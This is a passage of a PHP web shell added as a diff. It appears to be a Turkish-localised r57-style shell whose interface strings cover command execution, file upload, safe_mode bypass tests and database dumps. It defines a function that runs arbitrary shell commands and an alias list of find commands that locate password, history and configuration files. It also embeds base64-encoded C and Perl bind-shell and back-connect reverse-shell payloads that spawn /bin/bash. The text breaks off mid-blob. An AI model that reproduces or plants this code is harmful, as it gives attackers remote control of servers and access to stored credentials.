+'ru_text85'=>'&#1055;&#1088;&#1086;&#1074;&#1077;&#1088;&#1082;&#1072; &#1074;&#1086;&#1079;&#1084;&#1086;&#1078;&#1085;&#1086;&#1089;&#1090;&#1080; &#1086;&#1073;&#1093;&#1086;&#1076;&#1072; &#1086;&#1075;&#1088;&#1072;&#1085;&#1080;&#1095;&#1077;&#1085;&#1080;&#1081; safe_mode &#1095;&#1077;&#1088;&#1077;&#1079; &#1074;&#1099;&#1087;&#1086;&#1083;&#1085;&#1077;&#1085;&#1080;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076; &#1074; MSSQL &#1089;&#1077;&#1088;&#1074;&#1077;&#1088;&#1077;',
+/* --------------------------------------------------------------- */
+'eng_text1' =>'Komut Uygula',
+'eng_text2' =>'Server uzerinde komut calistir',
+'eng_text3' =>'Komut istemi',
+'eng_text4' =>'Calisma dizini',
+'eng_text5' =>'Servere Dosya Upload et',
+'eng_text6' =>'Yerel Dosya',
+'eng_text7' =>'Dizin Veya Dosya Bul',
+'eng_text8' =>'Sec',
+'eng_butt1' =>'Uygula',
+'eng_butt2' =>'Yukle',
+'eng_text9' =>'Porta baglan /bin/bash',
+'eng_text10'=>'Port',
+'eng_text11'=>'Sifre Giris',
+'eng_butt3' =>'Baglan',
+'eng_text12'=>'back-connect',
+'eng_text13'=>'IP',
+'eng_text14'=>'Port',
+'eng_butt4' =>'Baglan',
+'eng_text15'=>'Uzaktan servere dosya yukle',
+'eng_text16'=>'ile',
+'eng_text17'=>'Uzak Dosya',
+'eng_text18'=>'Yerel Dosya',
+'eng_text19'=>'Exploits',
+'eng_text20'=>'Kullan',
+'eng_text21'=>'&nbsp;Yeni ad',
+'eng_text22'=>'datapipe',
+'eng_text23'=>'Yerel port',
+'eng_text24'=>'Uzak host',
+'eng_text25'=>'Uzak port',
+'eng_text26'=>'Kullan',
+'eng_butt5' =>'Iste',
+'eng_text28'=>'Guvenlik Modunda Calis',
+'eng_text29'=>'Giris Yasak',
+'eng_butt6' =>'Degistir',
+'eng_text30'=>'Cat file',
+'eng_butt7' =>'Goster',
+'eng_text31'=>'Dosya Bulunamadi',
+'eng_text32'=>'PHP kod degerlendir',
+'eng_text33'=>'cUcurlL fonksiyonu ile open_basedir atlamayi test et.',
+'eng_butt8' =>'Testet',
+'eng_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.',
+'eng_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.',
+'eng_text36'=>'Database[VeriTabani]',
+'eng_text37'=>'Kullanici',
+'eng_text38'=>'Sifre',
+'eng_text39'=>'Tablo',
+'eng_text40'=>'Dump database table[DB Tablosu dok]',
+'eng_butt9' =>'Dump',
+'eng_text41'=>'DB dosyalarini kaydet.[Dump filed]',
+'eng_text42'=>'Dosya Duzenle',
+'eng_text43'=>'Dosya Duzenlemek icin',
+'eng_butt10'=>'Kaydet',
+'eng_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor',
+'eng_text45'=>'Dosya Kaydedildi',
+'eng_text46'=>'PHPinfo Goster',
+'eng_text47'=>'php.ini dosyasinda ki degiskenleri goster',
+'eng_text48'=>'Temp dosylarini sil',
+'eng_butt11'=>'Dosya Duzenle',
+'eng_text49'=>'Server dan bu scripti sil',
+'eng_text50'=>'CPU bilgisini incele',
+'eng_text51'=>'Memory[hafiza] bilgisini incele]',
+'eng_text52'=>'Metin Bul',
+'eng_text53'=>'Dizin icinde',
+'eng_text54'=>'Dosyalarda ki metni bul',
+'eng_butt12'=>'Bul',
+'eng_text55'=>'Sadece dosyalarda ki',
+'eng_text56'=>'Bulunmadi :( KeyCoder :)',
+'eng_text57'=>'Olustur/Sil Dosya/Dizin',
+'eng_text58'=>'isim',
+'eng_text59'=>'dosya',
+'eng_text60'=>'dizin',
+'eng_butt13'=>'Olustur/Sil',
+'eng_text61'=>'Dosya Olustur',
+'eng_text62'=>'Dizin Olustur',
+'eng_text63'=>'Dosya Sil',
+'eng_text64'=>'Dizin Sil',
+'eng_text65'=>'Olustur',
+'eng_text66'=>'Sil',
+'eng_text67'=>'Chown/Chgrp/Chmod',
+'eng_text68'=>'Uygula',
+'eng_text69'=>'param1',
+'eng_text70'=>'param2',
+'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
+'eng_text72'=>'Metin Bul',
+'eng_text73'=>'Klasor Bul',
+'eng_text74'=>'Dosya Bul',
+'eng_text75'=>'* you can use regexp',
+'eng_text76'=>'Metin ara dosyalarin icinde arama yoluyla',
+'eng_text77'=>'Database yapisini Goster',
+'eng_text78'=>'Tablolari Goster',
+'eng_text79'=>'Sutunlari Goster',
+'eng_text80'=>'Cesit',
+'eng_text81'=>'Net',
+'eng_text82'=>'Databases',
+'eng_text83'=>'SQL sorgusu yap',
+'eng_text84'=>'SQL sorgusu',
+);
+/*
+&#1040;&#1083;&#1080;&#1072;&#1089;&#1099; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;
+&#1055;&#1086;&#1079;&#1074;&#1086;&#1083;&#1103;&#1102;&#1090; &#1080;&#1079;&#1073;&#1077;&#1078;&#1072;&#1090;&#1100; &#1084;&#1085;&#1086;&#1075;&#1086;&#1082;&#1088;&#1072;&#1090;&#1085;&#1086;&#1075;&#1086; &#1085;&#1072;&#1073;&#1086;&#1088;&#1072; &#1086;&#1076;&#1085;&#1080;&#1093; &#1080; &#1090;&#1077;&#1093;-&#1078;&#1077; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;. ( &#1057;&#1076;&#1077;&#1083;&#1072;&#1085;&#1086; &#1073;&#1083;&#1072;&#1075;&#1086;&#1076;&#1072;&#1088;&#1103; &#1084;&#1086;&#1077;&#1081; &#1087;&#1088;&#1080;&#1088;&#1086;&#1076;&#1085;&#1086;&#1081; &#1083;&#1077;&#1085;&#1080; )
+&#1042;&#1099; &#1084;&#1086;&#1078;&#1077;&#1090;&#1077; &#1089;&#1072;&#1084;&#1080; &#1076;&#1086;&#1073;&#1072;&#1074;&#1083;&#1103;&#1090;&#1100; &#1080;&#1083;&#1080; &#1080;&#1079;&#1084;&#1077;&#1085;&#1103;&#1090;&#1100; &#1082;&#1086;&#1084;&#1072;&#1085;&#1076;&#1099;.
+*/
+$aliases=array(
+'Uygun Dosyalari bul'=>'find / -type f -perm -04000 -ls',
+'Genel uygun dosyalari dizinlerde bul'=>'find . -type f -perm -04000 -ls',
+'sgid dosyalari bul'=>'find / -type f -perm -02000 -ls',
+'sgid uygun dosyalari dizinlerde bul'=>'find . -type f -perm -02000 -ls',
+'config.inc.php dosyalarini bul'=>'find / -type f -name config.inc.php',
+'config.inc.php dosyalarini dizinlerde bul'=>'find . -type f -name config.inc.php',
+'config* dosyalarini bul'=>'find / -type f -name "config*"',
+'config* dosyalarini dizinlerde bul'=>'find . -type f -name "config*"',
+'Yazilabilir Dosyalari bul'=>'find / -type f -perm -2 -ls',
+'Yazilabilir Dosyalari dizinlerde bul'=>'find . -type f -perm -2 -ls',
+'Yazilabilir klasorleri bul'=>'find /  -type d -perm -2 -ls',
+'Yazilabilir butun klasorleri dizinlerde bul'=>'find . -type d -perm -2 -ls',
+'Yazilabilir dosya ve klasorleri bul'=>'find / -perm -2 -ls',
+'Yazilabilir butun dosya ve klasorleri dizinlerde bul'=>'find . -perm -2 -ls',
+'Butun service.pwd dosyalarini bul'=>'find / -type f -name service.pwd',
+'service.pwd dosyalarini genel dizinlerde bul'=>'find . -type f -name service.pwd',
+'Butun .htpasswd dosyalarini bul '=>'find / -type f -name .htpasswd',
+'.htpasswd dosylarini genel dizinlerde bul'=>'find . -type f -name .htpasswd',
+'Butun .bash_history dosyalarini bul'=>'find / -type f -name .bash_history',
+'.bash_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .bash_history',
+'Butun .mysql_history dosyalarini bul'=>'find / -type f -name .mysql_history',
+'.mysql_history dosyalarini genel dizinlerde bul'=>'find . -type f -name .mysql_history',
+'Butun .fetchmailrc dosyalarini bul'=>'find / -type f -name .fetchmailrc',
+'.fetchmailrc dosylarini genel dizinlerde bul'=>'find . -type f -name .fetchmailrc',
+'Linux uzerinde erisilebilinen sistem dosyalarini listele'=>'lsattr -va',
+'Acilan portlari goster'=>'netstat -an | grep -i listen',
+'----------------------------------------------------------------------------------------------------'=>'ls -la'
+);
+$table_up1  = "<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ";
+$table_up2  = " ::</div></b></font></td></tr><tr><td>";
+$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>";
+$table_end1 = "</td></tr>";
+$arrow = " <font face=FixedSysy color=gray>&#1080;</font>";
+$lb = "<font color=black>[</font>";
+$rb = "<font color=black>]</font>";
+$font = "<font face=Verdana size=-2>";
+$ts = "<table class=table1 width=100% align=center>";
+$te = "</table>";
+$fs = "<form name=form method=POST>";
+$fe = "</form>";
+
+if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
+$dir = @getcwd();
+$windows = 0;
+$unix = 0;
+if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1;
+if(empty($dir))
+ {
+ $os = getenv('OS');
+ if(empty($os)){ $os = php_uname(); }
+ if(empty($os)){ $os ="-"; $unix=1; }
+ else
+    {
+    if(@eregi("^win",$os)) { $windows = 1; }
+    else { $unix = 1; }
+    }
+ }
+if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
+  {
+    echo $head;
+    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
+    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
+    $sr->SearchText(0,0);
+    $res = $sr->GetResultFiles();
+    $found = $sr->GetMatchesCount();
+    $titles = $sr->GetTitles();
+    $r = "";
+    if($found > 0)
+    {
+      $r .= "<TABLE width=100%>";
+      foreach($res as $file=>$v)
+      {
+        $r .= "<TR>";
+        $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
+        $r .= ($windows)? str_replace("/","\\",$file) : $file;
+        $r .= "</b></font></ TD>";
+        $r .= "</TR>";
+        foreach($v as $a=>$b)
+        {
+          $r .= "<TR>";
+          $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
+          $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
+          $r .= "</TR>\n";
+        }
+      }
+      $r .= "</TABLE>";
+    echo $r;
+    }
+    else
+    {
+      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
+    }
+  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">GERI</a> ]</b></font></div>";
+  die();
+  }
+if($windows&&!$safe_mode)
+ {
+ $uname = ex("ver");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+else if($unix&&!$safe_mode)
+ {
+ $uname = ex("uname");
+ if(empty($uname)) { $safe_mode = 1; }
+ }
+$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
+if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
+function ws($i)
+{
+return @str_repeat("&nbsp;",$i);
+}
+function ex($cfe)
+{
+ $res = '';
+ if (!empty($cfe))
+ {
+  if(function_exists('exec'))
+   {
+    @exec($cfe,$res);
+    $res = join("\n",$res);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    $res = @shell_exec($cfe);
+   }
+  elseif(function_exists('system'))
+   {
+    @ob_start();
+    @system($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(function_exists('passthru'))
+   {
+    @ob_start();
+    @passthru($cfe);
+    $res = @ob_get_contents();
+    @ob_end_clean();
+   }
+  elseif(@is_resource($f = @popen($cfe,"r")))
+  {
+   $res = "";
+   while(!@feof($f)) { $res .= @fread($f,1024); }
+   @pclose($f);
+  }
+ }
+ return $res;
+}
+function we($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1079;&#1072;&#1087;&#1080;&#1089;&#1072;&#1090;&#1100; &#1074; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosya yazilabilir de?il ! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function re($i)
+{
+if($GLOBALS['language']=="ru"){ $text = '&#1054;&#1096;&#1080;&#1073;&#1082;&#1072;! &#1053;&#1077; &#1084;&#1086;&#1075;&#1091; &#1087;&#1088;&#1086;&#1095;&#1080;&#1090;&#1072;&#1090;&#1100; &#1092;&#1072;&#1081;&#1083; '; }
+else { $text = "[-] HATA! Dosyayi okuma izni yok! "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function ce($i)
+{
+if($GLOBALS['language']=="ru"){ $text = "&#1053;&#1077; &#1091;&#1076;&#1072;&#1083;&#1086;&#1089;&#1100; &#1089;&#1086;&#1079;&#1076;&#1072;&#1090;&#1100; "; }
+else { $text = "Olusturulamadi "; }
+echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>";
+return null;
+}
+function perms($mode)
+{
+if ($GLOBALS['windows']) return 0;
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+function in($type,$name,$size,$value)
+{
+ $ret = "<input type=".$type." name=".$name." ";
+ if($size != 0) { $ret .= "size=".$size." "; }
+ $ret .= "value=\"".$value."\">";
+ return $ret;
+}
+function which($pr)
+{
+$path = ex("which $pr");
+if(!empty($path)) { return $path; } else { return $pr; }
+}
+function cf($fname,$text)
+{
+ $w_file=@fopen($fname,"w") or we($fname);
+ if($w_file)
+ {
+ @fputs($w_file,@base64_decode($text));
+ @fclose($w_file);
+ }
+}
+function sr($l,$t1,$t2)
+ {
+ return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
+ }
+if (!@function_exists("view_size"))
+{
+function view_size($size)
+{
+ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
+ elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
+ elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
+ else {$size = $size . " B";}
+ return $size;
+}
+}
+function DirFiles($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (FALSE !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(!is_dir($dir."/".$file))
+          {
+            if($types)
+            {
+              $pos = @strrpos($file,".");
+              $ext = @substr($file,$pos,@strlen($file)-$pos);
+              if(@in_array($ext,@explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirFilesWide($dir)
+  {
+    $files = Array();
+    $dirs = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+          {
+            $file = @strtoupper($file);
+            $dirs[$file] = '&lt;DIR&gt;';
+          }
+          else
+            $files[$file] = @filesize($dir."/".$file);
+        }
+      }
+      @closedir($handle);
+      @ksort($dirs);
+      @ksort($files);
+      $files = @array_merge($dirs,$files);
+    }
+    return $files;
+  }
+  function DirFilesR($dir,$types='')
+  {
+    $files = Array();
+    if(($handle = @opendir($dir)))
+    {
+      while (false !== ($file = @readdir($handle)))
+      {
+        if ($file != "." && $file != "..")
+        {
+          if(@is_dir($dir."/".$file))
+            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
+          else
+          {
+            $pos = @strrpos($file,".");
+            $ext = @substr($file,$pos,@strlen($file)-$pos);
+            if($types)
+            {
+              if(@in_array($ext,explode(';',$types)))
+                $files[] = $dir."/".$file;
+            }
+            else
+              $files[] = $dir."/".$file;
+          }
+        }
+      }
+      @closedir($handle);
+    }
+    return $files;
+  }
+  function DirPrintHTMLHeaders($dir)
+  {
+    $pockets = '';
+  	$handle = @opendir($dir) or die("Can't open directory $dir");
+    echo "    <ul style='margin-left: 0px; padding-left: 20px;'>\n";
+    while (false !== ($file = @readdir($handle)))
+    {
+      if ($file != "." && $file != "..")
+      {
+        if(@is_dir($dir."/".$file))
+        {
+          echo "      <li><b>[ $file ]</b></li>\n";
+          DirPrintHTMLHeaders($dir."/".$file);
+        }
+        else
+        {
+          $pos = @strrpos($file,".");
+          $ext = @substr($file,$pos,@strlen($file)-$pos);
+          if(@in_array($ext,array('.htm','.html')))
+          {
+            $header = '-=None=-';
+            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);
+            for($a=0;$a<count($strings);$a++)
+            {
+              $pattern = '(<title>(.+)</title>)';
+              if(@eregi($pattern,$strings[$a],$pockets))
+              {
+                $header = "&laquo;".$pockets[2]."&raquo;";
+                break;
+              }
+            }
+            echo "      <li>".$header."</li>\n";
+          }
+        }
+      }
+    }
+    echo "    </ul>\n";
+    @closedir($handle);
+  }
+
+  class SearchResult
+  {
+    var $text;
+    var $FilesToSearch;
+    var $ResultFiles;
+    var $FilesTotal;
+    var $MatchesCount;
+    var $FileMatschesCount;
+    var $TimeStart;
+    var $TimeTotal;
+    var $titles;
+    function SearchResult($dir,$text,$filter='')
+    {
+      $dirs = @explode(";",$dir);
+      $this->FilesToSearch = Array();
+      for($a=0;$a<count($dirs);$a++)
+        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
+      $this->text = $text;
+      $this->FilesTotal = @count($this->FilesToSearch);
+      $this->TimeStart = getmicrotime();
+      $this->MatchesCount = 0;
+      $this->ResultFiles = Array();
+      $this->FileMatchesCount = Array();
+      $this->titles = Array();
+    }
+    function GetFilesTotal() { return $this->FilesTotal; }
+    function GetTitles() { return $this->titles; }
+    function GetTimeTotal() { return $this->TimeTotal; }
+    function GetMatchesCount() { return $this->MatchesCount; }
+    function GetFileMatchesCount() { return $this->FileMatchesCount; }
+    function GetResultFiles() { return $this->ResultFiles; }
+    function SearchText($phrase=0,$case=0) {
+    $qq = @explode(' ',$this->text);
+    $delim = '|';
+      if($phrase)
+        foreach($qq as $k=>$v)
+          $qq[$k] = '\b'.$v.'\b';
+      $words = '('.@implode($delim,$qq).')';
+      $pattern = "/".$words."/";
+      if(!$case)
+        $pattern .= 'i';
+      foreach($this->FilesToSearch as $k=>$filename)
+      {
+        $this->FileMatchesCount[$filename] = 0;
+        $FileStrings = @file($filename) or @next;
+        for($a=0;$a<@count($FileStrings);$a++)
+        {
+          $count = 0;
+          $CurString = $FileStrings[$a];
+          $CurString = @Trim($CurString);
+          $CurString = @strip_tags($CurString);
+          $aa = '';
+          if(($count = @preg_match_all($pattern,$CurString,$aa)))
+          {
+            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
+            $this->ResultFiles[$filename][$a+1] = $CurString;
+            $this->MatchesCount += $count;
+            $this->FileMatchesCount[$filename] += $count;
+          }
+        }
+      }
+      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
+    }
+  }
+  function getmicrotime()
+  {
+    list($usec,$sec) = @explode(" ",@microtime());
+    return ((float)$usec + (float)$sec);
+  }
+$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
+A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
+GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
+b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
+pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
+NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
+ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
+ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
+7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
+9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
+dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
+lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
+$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
+VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
+JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
+TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
+lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
+Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
+Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
+lIENPTk47DQpleGl0IDA7DQp9DQp9";
+$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
+aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
+hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
+sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
+kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
+KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
+OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
+BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
+SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
+KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
+sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
+Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
+QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
+Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2
+x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb
+HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj
